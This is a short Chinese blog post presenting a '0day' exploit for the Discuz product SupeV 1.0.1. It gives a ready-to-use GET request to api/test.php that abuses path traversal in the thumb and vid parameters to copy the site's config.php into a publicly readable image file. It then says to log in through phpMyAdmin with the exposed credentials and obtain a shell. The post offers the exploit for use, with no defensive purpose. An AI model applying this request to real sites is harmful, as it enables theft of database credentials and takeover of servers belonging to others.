SupeV 1.0.1 0DAY
[tag]discuz[/tag]
最近传得很火,还有某淫写工具来卖钱
"视频播客 SupeV 1.0.1" 即discuz旗下产品。
下面介绍利用方法:
漏洞形成,直接以get方式请求
api/test.php?thumb=../config.php&vid=../../1会把config.php复制到attachments\thumb\1.jpg(不是根目录),
这样就得到了网站的配置文件,phpmyadmin连上去,然后获得shell。
不会的请参见网上相应文章。
SupeV 1.0.1 0DAY:等您坐沙发呢!